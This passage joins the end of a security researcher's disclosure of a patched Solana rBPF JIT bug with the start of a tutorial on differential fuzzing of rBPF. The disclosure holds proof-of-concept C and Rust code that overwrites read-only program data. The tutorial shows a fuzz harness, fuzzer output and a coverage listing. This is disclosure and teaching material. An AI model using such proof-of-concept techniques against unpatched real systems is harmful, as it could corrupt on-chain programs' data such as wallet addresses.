    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscalls).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    for _ in 0..4 {
        let jit_res = {
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
            let res = jit_vm.execute_program_jit(&mut jit_meter);
            res
        };
        eprintln!("{} => {:?}", 1, jit_res);
    }
}

This program, when executed, has the following output:

howdy
evil!
evil!
evil!
evil!
evil!
evil!
evil!

These first two files demonstrate the ability to overwrite the readonly data present in binaries persistently. Notice that we actually execute the JIT’d code multiple times, yet our changes to the value in data are persistent.

Implications

Suppose that there was a faulty offset or a user-controlled offset present in a BPF-based on-chain program. A malicious user could modify the readonly data of the program to replace certain contexts. In the best case scenario, this might lead to DoS of the program. In the worst case, this could lead to the replacement of fund amounts, of wallet addresses, etc.

Reporting

Having assembled my proof-of-concepts, my implications, and so on, I sent in the following report to Solana on February 4th:

Report for bug 2 as submitted to Solana

An incorrectly sized memory operand emitted by src/jit.rs:1490 may lead to .rodata section corruption due to an incorrect is_writable check. The cmp emitted is cmp DWORD PTR [rax+0x19], 0x0. As a result, when the uninitialised data present in the field padding of MemoryRegion is non-zero, the comparison will fail and assume that the section is writable. The data which is overwritten is persistent during the lifetime of the Executable instance as the data overwritten is in Executable.ro_section and thus affects future executions of the program without recompilation.

It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.

The first attack scenario where this vulnerability may be leveraged is in corruption of believed read-only data; see value_in_ro.{c,so} (intended to be placed within tests/elfs/) as an example of this behaviour. The example provided is contrived, but in scenarios where BPF programs do not correctly sanitise offsets in input, it may be possible for remote attackers to craft payloads which corrupt data within the .rodata section and thus replace secrets, operational data, etc. In the worst case, this may include replacement of critical data such as fixed wallet addresses for the lifetime of the Executable instance, which may be many executions. To test this behaviour, refer to howdy.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.

The second attack scenario is in corruption of BPF source code, which poisons future analysis and compilation. In the worst case (which is probably not a valid scenario), if the Executable is erroneously JIT compiled a second time after being executed in JIT once, the JIT compilation may emit unchecked BPF instructions as the verifier used in from_elf/from_text_bytes is not used per-compilation. Analysis and tracing is similarly corrupted, which may be leveraged to obscure or misrepresent the instructions which were previously executed. An example of the latter is provided in analysis-corruption.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.

While this vulnerability is largely uncategorised by the security policy provided, due to the possibility of the corruption of believed read-only data, I propose that this vulnerability be categorised under Other Attacks or Safety Violations.

value_in_ro.c (.so available upon request)

typedef unsigned char uint8_t;
typedef unsigned long int uint64_t;

extern void log(const char*, uint64_t);

static const char data[] = "howdy";

extern uint64_t entrypoint(const uint8_t *input) {
  log(data, 5);
  char *overwritten = (char *)data;
  overwritten[0] = 'e';
  overwritten[1] = 'v';
  overwritten[2] = 'i';
  overwritten[3] = 'l';
  overwritten[4] = '!';
  log(data, 5);

  return 0;
}

analysis-corruption.rs

use std::collections::BTreeMap;

use solana_rbpf::elf::Executable;
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::insn_builder::BpfCode;
use solana_rbpf::insn_builder::Instruction;
use solana_rbpf::insn_builder::IntoBytes;
use solana_rbpf::insn_builder::MemSize;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::user_error::UserError;
use solana_rbpf::verifier::check;
use solana_rbpf::vm::Config;
use solana_rbpf::vm::EbpfVm;
use solana_rbpf::vm::SyscallRegistry;
use solana_rbpf::vm::TestInstructionMeter;

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&mut bpf_functions, 0, "entrypoint", true).unwrap();
    let mut code = BpfCode::default();
    code
        .load(MemSize::DoubleWord).set_dst(0).set_imm(0).push()
        .load(MemSize::Word).set_imm(1).push()
        .store(MemSize::DoubleWord).set_dst(0).set_off(0).set_imm(0).push()
        .exit().push();
    let prog = code.into_bytes();
    assert!(check(prog, &config).is_ok());
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(prog, None, config, SyscallRegistry::default(), bpf_functions).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    let jit_res = {
        let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
        let res = jit_vm.execute_program_jit(&mut jit_meter);
        let jit_tracer = jit_vm.get_tracer();
        let analysis = Analysis::from_executable(&executable);
        let stderr = std::io::stderr();
        jit_tracer.write(&mut stderr.lock(), &analysis).unwrap();
        res
    };
    eprintln!("{} => {:?}", 1, jit_res);
}

howdy.rs

use std::fs::File;
use std::io::Read;

use solana_rbpf::elf::Executable;
use solana_rbpf::user_error::UserError;
use solana_rbpf::verifier::check;
use solana_rbpf::vm::Config;
use solana_rbpf::vm::EbpfVm;
use solana_rbpf::vm::SyscallObject;
use solana_rbpf::vm::SyscallRegistry;
use solana_rbpf::vm::TestInstructionMeter;

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut elf = Vec::new();
    File::open("tests/elfs/value_in_ro.so").unwrap().read_to_end(&mut elf).unwrap();
    let mut syscalls = SyscallRegistry::default();
    syscalls.register_syscall_by_name(b"log", solana_rbpf::syscalls::BpfSyscallString::call).unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscalls).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    for _ in 0..4 {
        let jit_res = {
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
            let res = jit_vm.execute_program_jit(&mut jit_meter);
            res
        };
        eprintln!("{} => {:?}", 1, jit_res);
    }
}

The bug was patched in a mere 4 hours.

Solana classified this bug as a Denial-of-Service (Non-RPC) and awarded $100k. I disagreed strongly with this classification, but Solana said that due to the low likelihood of the exploitation of this bug (requiring a vulnerability in the on-chain program) they would offer $100k instead of the originally suggested $1m or $400k. They would not move on this point.

However, I would offer that (was that the actually basis for bug classification) that they should update their Security Policy to reflect that meaning. It was obviously very disappointing to hear that they would not be offering the bounty I expected given the classification categories provided.

Okay, so what’d you do with the money??

It would be bad form of me to not explain the incredible flexibility shown by Solana in terms of how they handled my payout. I intended to donate the funds to the Texas A&M Cybersecurity Club, at which I gained a lot of the skills necessary to perform this research and these exploits, and Solana was very willing to sidestep their listed policy and donate the funds directly in USD rather than making me handle the tokens on my own, which would have dramatically affected how much I could have donated due to tax. So, despite my concerns regarding their policy, I was very pleased with their willingness to accommodate my wishes with the bounty payout.

secret club
Earn $200K by fuzzing for a weekend: Part 1addison 11 May 2022 at 07:00

Earn $200K by fuzzing for a weekend: Part 1

secret club

By: addison

11 May 2022 at 07:00

By applying well-known fuzzing techniques to a popular target, I found several bugs that in total yielded over $200K in bounties. In this article I will demonstrate how powerful fuzzing can be when applied to software which has not yet faced sufficient testing.

If you’re here just for the bug disclosures, see Part 2, though I encourage you all, even those who have not yet tried their hand at fuzzing, to read through this.

Exposition

A few friends and I ran a little Discord server (now a Matrix space) which in which we discussed security and vulnerability research techniques. One of the things we have running in the server is a bot which posts every single CVE as they come out. And, yeah, I read a lot of them.

One day, the bot posted something that caught my eye:

This marks the beginning of our timeline: January 28th. I had noticed this CVE in particular for two reasons:

it was BPF, which I find to be an absurdly cool concept as it’s used in the Linux kernel (a JIT compiler in the kernel!!! what!!!)
it was a JIT compiler written in Rust

This CVE showed up almost immediately after I had developed some relatively intensive fuzzing for some of my own Rust software (specifically, a crate for verifying sokoban solutions where I had observed similar issues and thought “that looks familiar”).

Knowing what I had learned from my experience fuzzing my own software and that bugs in Rust programs could be quite easily found with the combo of cargo fuzz and arbitrary, I thought: “hey, why not?”.

The Target, and figuring out how to test it

Solana, as several of you likely know, “is a decentralized blockchain built to enable scalable, user-friendly apps for the world”. They primarily are known for their cryptocurrency, SOL, but also are a blockchain which operates really any form of smart contract.

rBPF in particular is a self-described “Rust virtual machine and JIT compiler for eBPF programs”. Notably, it implements both an interpreter and a JIT compiler for BPF programs. In other words: two different implementations of the same program, which theoretically exhibited the same behaviour when executed.

I was lucky enough to both take a software testing course in university and to have been part of a research group doing fuzzing (admittedly, we were fuzzing hardware, not software, but the concepts translate). A concept that I had hung onto in particular is the idea of test oracles – a way to distinguish what is “correct” behaviour and what is not in a design under test.

In particular, something that stood out to me about the presence of both an interpreter and a JIT compiler in rBPF is that we, in effect, had a perfect pseudo-oracle; as Wikipedia puts it:

a separately written program which can take the same input as the program or system under test so that their outputs may be compared to understand if there might be a problem to investigate.

Those of you who have more experience in fuzzing will recognise this concept as differential fuzzing, but I think we can often overlook that differential fuzzing is just another face of a pseudo-oracle.

In this particular case, we can execute the interpreter, one implementation of rBPF, and then execute the JIT compiled version, another implementation, with the same inputs (i.e., memory state, entrypoint, code, etc.) and see if their outputs are different. If they are, one of them must necessarily be incorrect per the description of the rBPF crate: two implementations of exactly the same behaviour.

Writing a fuzzer

To start off, let’s try to throw a bunch of inputs at it without really tuning to anything in particular. This allows us to sanity check that our basic fuzzing implementation actually works as we expect.

The dumb fuzzer

First, we need to figure out how to execute the interpreter. Thankfully, there are several examples of this readily available in a variety of tests. I referenced the test_interpreter_and_jit macro present in ubpf_execution.rs as the basis for how my so-called “dumb” fuzzer executes.

I’ve provided a sequence of components you can look at one chunk at a time before moving onto the whole fuzzer. Just click on the dropdowns to view the code relevant to that step. You don’t necessarily need to to understand the point of this post.

Step 1: Defining our inputs

We must define our inputs such that it’s actually useful for our fuzzer. Thankfully, arbitrary makes it near trivial to derive an input from raw bytes.

#[derive(arbitrary::Arbitrary, Debug)]
struct DumbFuzzData {
    template: ConfigTemplate,
    prog: Vec<u8>,
    mem: Vec<u8>,
}

If you want to see the definition of ConfigTemplate, you can check it out in common.rs, but all you need to know is that its purpose is to test the interpreter under a variety of different execution configurations. It’s not particularly important to understand the fundamental bits of the fuzzer.

Step 2: Setting up the VM

Setting up the fuzz target and the VM comes next. This will allow us to not only execute our test, but later to actually check if the behaviour is correct.

fuzz_target!(|data: DumbFuzzData| {
    let prog = data.prog;
    let config = data.template.into();
    if check(&prog, &config).is_err() {
        // verify please
        return;
    }
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        &prog,
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    let mem_region = MemoryRegion::new_writable(&mut mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    // TODO in step 3
});

You can find the details for how fuzz_target works from the Rust Fuzz Book which goes over how it works in higher detail than would be appropriate here.

Step 3: Executing our input and comparing output

In this step, we just execute the VM with our provided input. In future iterations, we’ll compare the output of interpreter vs JIT, but in this version, we’re just executing the interpreter to see if we can induce crashes.

fuzz_target!(|data: DumbFuzzData| {
    // see step 2 for this bit

    drop(black_box(vm.execute_program_interpreted(
        &mut TestInstructionMeter { remaining: 1024 },
    )));
});

I use black_box here but I’m not entirely convinced that it’s necessary. I added it to ensure that the result of the interpreted program’s execution isn’t simply discarded and thus the execution marked unnecessary, but I’m fairly certain it wouldn’t be regardless.

Note that we are not checking for if the execution failed here. If the BPF program fails: we don’t care! We only care if the VM crashes for any reason.

Step 4: Put it together

Below is the final code for the fuzzer, including all of the bits I didn’t show above for concision.

#![feature(bench_black_box)]
#![no_main]

use std::collections::BTreeMap;
use std::hint::black_box;

use libfuzzer_sys::fuzz_target;

use solana_rbpf::{
    ebpf,
    elf::{register_bpf_function, Executable},
    memory_region::MemoryRegion,
    user_error::UserError,
    verifier::check,
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},
};

use crate::common::ConfigTemplate;

mod common;

#[derive(arbitrary::Arbitrary, Debug)]
struct DumbFuzzData {
    template: ConfigTemplate,
    prog: Vec<u8>,
    mem: Vec<u8>,
}

fuzz_target!(|data: DumbFuzzData| {
    let prog = data.prog;
    let config = data.template.into();
    if check(&prog, &config).is_err() {
        // verify please
        return;
    }
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        &prog,
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    let mem_region = MemoryRegion::new_writable(&mut mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    drop(black_box(vm.execute_program_interpreted(
        &mut TestInstructionMeter { remaining: 1024 },
    )));
});

Theoretically, an up-to-date version is available in the rBPF repo.

Evaluation

$ cargo +nightly fuzz run dumb -- -max_total_time=300
... snip ...
#2902510	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9675 rss: 355Mb L: 134/3126 MS: 3 ChangeBit-InsertByte-PersAutoDict- DE: "\x07\xff\xff3"-
#2902537	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9675 rss: 355Mb L: 60/3126 MS: 2 ChangeBinInt-EraseBytes-
#2905608	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9685 rss: 355Mb L: 101/3126 MS: 1 EraseBytes-
#2905770	NEW    cov: 1092 ft: 2155 corp: 725/58Kb lim: 4096 exec/s: 9685 rss: 355Mb L: 61/3126 MS: 2 ShuffleBytes-CrossOver-
#2906805	DONE   cov: 1092 ft: 2155 corp: 725/58Kb lim: 4096 exec/s: 9657 rss: 355Mb
Done 2906805 runs in 301 second(s)

After executing the fuzzer, we can evaluate its effectiveness at finding interesting inputs by checking its coverage after executing for a given time (note the use of the -max_total_time flag). In this case, I want to determine just how well it covers the function which handles interpreter execution. To do so, I issue the following commands:

$ cargo +nightly fuzz coverage dumb
$ rust-cov show -Xdemangler=rustfilt fuzz/target/x86_64-unknown-linux-gnu/release/dumb -instr-profile=fuzz/coverage/dumb/coverage.profdata -show-line-counts-or-regions -name=execute_program_interpreted_inner

Command output of rust-cov

If you’re not familiar with llvm coverage output, the first column is the line number, the second column is the number of times that that particular line was hit, and the third column is the code itself.

<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError, solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:
  709|    763|    fn execute_program_interpreted_inner(
  710|    763|        &mut self,
  711|    763|        instruction_meter: &mut I,
  712|    763|        initial_insn_count: u64,
  713|    763|        last_insn_count: &mut u64,
  714|    763|    ) -> ProgramResult<E> {
  715|    763|        // R1 points to beginning of input memory, R10 to the stack of the first frame
  716|    763|        let mut reg: [u64; 11] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, self.stack.get_frame_ptr()];
  717|    763|        reg[1] = ebpf::MM_INPUT_START;
  718|    763|
  719|    763|        // Loop on instructions
  720|    763|        let config = self.executable.get_config();
  721|    763|        let mut next_pc: usize = self.executable.get_entrypoint_instruction_offset()?;
                                                                                                  ^0
  722|    763|        let mut remaining_insn_count = initial_insn_count;
  723|   136k|        while (next_pc + 1) * ebpf::INSN_SIZE <= self.program.len() {
  724|   135k|            *last_insn_count += 1;
  725|   135k|            let pc = next_pc;
  726|   135k|            next_pc += 1;
  727|   135k|            let mut instruction_width = 1;
  728|   135k|            let mut insn = ebpf::get_insn_unchecked(self.program, pc);
  729|   135k|            let dst = insn.dst as usize;
  730|   135k|            let src = insn.src as usize;
  731|   135k|
  732|   135k|            if config.enable_instruction_tracing {
  733|      0|                let mut state = [0u64; 12];
  734|      0|                state[0..11].copy_from_slice(&reg);
  735|      0|                state[11] = pc as u64;
  736|      0|                self.tracer.trace(state);
  737|   135k|            }
  738|       |
  739|   135k|            match insn.opc {
  740|   135k|                _ if dst == STACK_PTR_REG && config.dynamic_stack_frames => {
  741|    361|                    match insn.opc {
  742|     16|                        ebpf::SUB64_IMM => self.stack.resize_stack(-insn.imm),
  743|    345|                        ebpf::ADD64_IMM => self.stack.resize_stack(insn.imm),
  744|       |                        _ => {
  745|       |                            #[cfg(debug_assertions)]
  746|      0|                            unreachable!("unexpected insn on r11")
  747|       |                        }
  748|       |                    }
  749|       |                }
  750|       |
  751|       |                // BPF_LD class
  752|       |                // Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not
  753|       |                // bother re-fetching it, just use ebpf::MM_INPUT_START already.
  754|       |                ebpf::LD_ABS_B   => {
  755|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  756|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^0
  757|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  758|       |                },
  759|       |                ebpf::LD_ABS_H   =>  {
  760|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  761|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^0
  762|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  763|       |                },
  764|       |                ebpf::LD_ABS_W   => {
  765|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  766|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^0
  767|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  768|       |                },
  769|       |                ebpf::LD_ABS_DW  => {
  770|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  771|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^0
  772|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  773|       |                },
  774|       |                ebpf::LD_IND_B   => {
  775|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  776|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^0
  777|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  778|       |                },
  779|       |                ebpf::LD_IND_H   => {
  780|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  781|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^0
  782|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  783|       |                },
  784|       |                ebpf::LD_IND_W   => {
  785|      7|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  786|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^0
  787|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  788|       |                },
  789|       |                ebpf::LD_IND_DW  => {
  790|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  791|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^0
  792|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  793|       |                },
  794|       |
  795|      0|                ebpf::LD_DW_IMM  => {
  796|      0|                    ebpf::augment_lddw_unchecked(self.program, &mut insn);
  797|      0|                    instruction_width = 2;
  798|      0|                    next_pc += 1;
  799|      0|                    reg[dst] = insn.imm as u64;
  800|      0|                },
  801|       |
  802|       |                // BPF_LDX class
  803|       |                ebpf::LD_B_REG   => {
  804|     18|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  805|     18|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^2
  806|      2|                    reg[dst] = unsafe { *host_ptr as u64 };
  807|       |                },
  808|       |                ebpf::LD_H_REG   => {
  809|     18|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  810|     18|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^6
  811|      6|                    reg[dst] = unsafe { *host_ptr as u64 };
  812|       |                },
  813|       |                ebpf::LD_W_REG   => {
  814|    365|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  815|    365|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^348
  816|    348|                    reg[dst] = unsafe { *host_ptr as u64 };
  817|       |                },
  818|       |                ebpf::LD_DW_REG  => {
  819|     15|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  820|     15|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^5
  821|      5|                    reg[dst] = unsafe { *host_ptr as u64 };
  822|       |                },
  823|       |
  824|       |                // BPF_ST class
  825|       |                ebpf::ST_B_IMM   => {
  826|     26|                    let vm_addr = (reg[dst] as i64).wrapping_add( insn.off as i64) as u64;
  827|     26|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^20
  828|     20|                    unsafe { *host_ptr = insn.imm as u8 };
  829|       |                },
  830|       |                ebpf::ST_H_IMM   => {
  831|     23|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  832|     23|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^13
  833|     13|                    unsafe { *host_ptr = insn.imm as u16 };
  834|       |                },
  835|       |                ebpf::ST_W_IMM   => {
  836|     12|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  837|     12|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^5
  838|      5|                    unsafe { *host_ptr = insn.imm as u32 };
  839|       |                },
  840|       |                ebpf::ST_DW_IMM  => {
  841|     17|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  842|     17|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^11
  843|     11|                    unsafe { *host_ptr = insn.imm as u64 };
  844|       |                },
  845|       |
  846|       |                // BPF_STX class
  847|       |                ebpf::ST_B_REG   => {
  848|     17|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  849|     17|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^3
  850|      3|                    unsafe { *host_ptr = reg[src] as u8 };
  851|       |                },
  852|       |                ebpf::ST_H_REG   => {
  853|     13|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  854|     13|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^3
  855|      3|                    unsafe { *host_ptr = reg[src] as u16 };
  856|       |                },
  857|       |                ebpf::ST_W_REG   => {
  858|     19|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  859|     19|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^7
  860|      7|                    unsafe { *host_ptr = reg[src] as u32 };
  861|       |                },
  862|       |                ebpf::ST_DW_REG  => {
  863|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  864|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^2
  865|      2|                    unsafe { *host_ptr = reg[src] as u64 };
  866|       |                },
  867|       |
  868|       |                // BPF_ALU class
  869|  1.06k|                ebpf::ADD32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_add(insn.imm as i32)   as u64,
  870|    695|                ebpf::ADD32_REG  => reg[dst] = (reg[dst] as i32).wrapping_add(reg[src] as i32)   as u64,
  871|    710|                ebpf::SUB32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_sub(insn.imm as i32)   as u64,
  872|    345|                ebpf::SUB32_REG  => reg[dst] = (reg[dst] as i32).wrapping_sub(reg[src] as i32)   as u64,
  873|  1.03k|                ebpf::MUL32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_mul(insn.imm as i32)   as u64,
  874|  2.07k|                ebpf::MUL32_REG  => reg[dst] = (reg[dst] as i32).wrapping_mul(reg[src] as i32)   as u64,
  875|  1.03k|                ebpf::DIV32_IMM  => reg[dst] = (reg[dst] as u32 / insn.imm as u32)               as u64,
  876|       |                ebpf::DIV32_REG  => {
  877|      4|                    if reg[src] as u32 == 0 {
  878|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  879|      2|                    }
  880|      2|                    reg[dst] = (reg[dst] as u32 / reg[src] as u32) as u64;
  881|       |                },
  882|       |                ebpf::SDIV32_IMM  => {
  883|    346|                    if reg[dst] as i32 == i32::MIN && insn.imm == -1 {
                                                                    ^0
  884|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  885|    346|                    }
  886|    346|                    reg[dst] = (reg[dst] as i32 / insn.imm as i32) as u64;
  887|       |                }
  888|       |                ebpf::SDIV32_REG  => {
  889|     13|                    if reg[src] as i32 == 0 {
  890|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  891|     11|                    }
  892|     11|                    if reg[dst] as i32 == i32::MIN && reg[src] as i32 == -1 {
                                                                    ^0
  893|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  894|     11|                    }
  895|     11|                    reg[dst] = (reg[dst] as i32 / reg[src] as i32) as u64;
  896|       |                },
  897|    346|                ebpf::OR32_IMM   =>   reg[dst] = (reg[dst] as u32             | insn.imm as u32) as u64,
  898|    351|                ebpf::OR32_REG   =>   reg[dst] = (reg[dst] as u32             | reg[src] as u32) as u64,
  899|    345|                ebpf::AND32_IMM  =>   reg[dst] = (reg[dst] as u32             & insn.imm as u32) as u64,
  900|  1.03k|                ebpf::AND32_REG  =>   reg[dst] = (reg[dst] as u32             & reg[src] as u32) as u64,
  901|      0|                ebpf::LSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(insn.imm as u32) as u64,
  902|    369|                ebpf::LSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(reg[src] as u32) as u64,
  903|      0|                ebpf::RSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(insn.imm as u32) as u64,
  904|    346|                ebpf::RSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(reg[src] as u32) as u64,
  905|    690|                ebpf::NEG32      => { reg[dst] = (reg[dst] as i32).wrapping_neg()                as u64; reg[dst] &= u32::MAX as u64; },
  906|    347|                ebpf::MOD32_IMM  =>   reg[dst] = (reg[dst] as u32             % insn.imm as u32) as u64,
  907|       |                ebpf::MOD32_REG  => {
  908|      4|                    if reg[src] as u32 == 0 {
  909|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  910|      2|                    }
  911|      2|                                      reg[dst] = (reg[dst] as u32            % reg[src]  as u32) as u64;
  912|       |                },
  913|  1.04k|                ebpf::XOR32_IMM  =>   reg[dst] = (reg[dst] as u32            ^ insn.imm  as u32) as u64,
  914|  2.74k|                ebpf::XOR32_REG  =>   reg[dst] = (reg[dst] as u32            ^ reg[src]  as u32) as u64,
  915|    349|                ebpf::MOV32_IMM  =>   reg[dst] = insn.imm  as u32                                as u64,
  916|  1.03k|                ebpf::MOV32_REG  =>   reg[dst] = (reg[src] as u32)                               as u64,
  917|      0|                ebpf::ARSH32_IMM => { reg[dst] = (reg[dst] as i32).wrapping_shr(insn.imm as u32) as u64; reg[dst] &= u32::MAX as u64; },
  918|      2|                ebpf::ARSH32_REG => { reg[dst] = (reg[dst] as i32).wrapping_shr(reg[src] as u32) as u64; reg[dst] &= u32::MAX as u64; },
  919|      0|                ebpf::LE         => {
  920|      0|                    reg[dst] = match insn.imm {
  921|      0|                        16 => (reg[dst] as u16).to_le() as u64,
  922|      0|                        32 => (reg[dst] as u32).to_le() as u64,
  923|      0|                        64 =>  reg[dst].to_le(),
  924|       |                        _  => {
  925|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  926|       |                        }
  927|       |                    };
  928|       |                },
  929|      0|                ebpf::BE         => {
  930|      0|                    reg[dst] = match insn.imm {
  931|      0|                        16 => (reg[dst] as u16).to_be() as u64,
  932|      0|                        32 => (reg[dst] as u32).to_be() as u64,
  933|      0|                        64 =>  reg[dst].to_be(),
  934|       |                        _  => {
  935|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  936|       |                        }
  937|       |                    };
  938|       |                },
  939|       |
  940|       |                // BPF_ALU64 class
  941|    402|                ebpf::ADD64_IMM  => reg[dst] = reg[dst].wrapping_add(insn.imm as u64),
  942|    351|                ebpf::ADD64_REG  => reg[dst] = reg[dst].wrapping_add(reg[src]),
